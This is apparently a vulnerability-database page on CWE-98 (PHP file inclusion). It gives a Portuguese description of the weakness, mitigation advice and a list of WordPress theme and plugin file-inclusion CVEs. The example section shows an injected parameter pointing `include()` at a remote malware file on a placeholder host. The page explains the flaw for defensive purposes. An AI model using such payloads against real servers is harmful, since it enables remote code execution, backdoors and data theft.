Weaknesses of type CWE-98

1,308 results

Inclusão remota de arquivo

Ocorre quando a aplicação inclui dinamicamente um arquivo (via funções como `include()`, `require()` em PHP) sem validar corretamente a entrada do usuário. Um atacante fornece uma URL remota maliciosa e consegue executar código arbitrário no servidor, comprometendo completamente a aplicação.

Example

Uma página PHP recebe um parâmetro `page` e faz `include($_GET['page'])`. Um atacante passa `page=http://seuservidor.com/malware.php` e consegue executar o arquivo malicioso no contexto do servidor web, roubando dados ou instalando backdoors.

How to mitigate

Valide rigorosamente entrada de usuário: use lista branca de arquivos permitidos, não permita URLs remotas, desabilite as directives `allow_url_include` e `allow_url_fopen` no PHP, e sempre sanitize caminhos de arquivo.

CVE-2025-67526HIGHWordPress Sailing theme < 4.4.6 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-67527HIGHWordPress Digiqole theme < 2.2.7 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68983HIGHWordPress Greenmart theme <= 4.2.11 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-67524HIGHWordPress Jobmonster Elementor Addon plugin <= 1.1.4 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-67522HIGHWordPress Jobmonster theme <= 4.8.2 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-67525HIGHWordPress ekommart theme < 4.3.1 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-5137MEDIUMRTMKit <= 2.0.7 - Authenticated (Contributor+) Limited Local File Inclusion via 'template' ParameterEPSS 0.4%CVE-2025-67528HIGHWordPress Urna theme <= 2.5.12 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-68984HIGHWordPress Puca theme <= 2.6.39 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-67523HIGHWordPress Exhibz theme <= 3.0.9 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2024-37479HIGHWordPress LA-Studio Element Kit for Elementor plugin <= 1.3.8.1 - Contributor+ Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-54709HIGHWordPress Sala Theme <= 1.1.6 - Local File Inclusion VulnerabilityEPSS 0.4%CVE-2026-22371HIGHWordPress Gustavo theme <= 1.2.2 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-22373HIGHWordPress Fooddy theme <= 1.3.10 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-22521HIGHWordPress Handmade Framework plugin <= 3.9 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-22356HIGHWordPress Jetpack CRM plugin <= 6.7.0 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2024-52385MEDIUMWordPress Team Member – Multi Language Supported Team plugin <= 7.4 - Limited Local File Inclusion vulnerabilityEPSS 0.4%CVE-2026-46687HIGHEmlog Local File Inclusion (LFI)EPSS 0.4%CVE-2025-69109HIGHWordPress Raider Spirit theme <= 1.1.2 - Local File Inclusion vulnerabilityEPSS 0.4%CVE-2025-69106HIGHWordPress Imba theme <= 1.5.0 - Local File Inclusion vulnerabilityEPSS 0.4%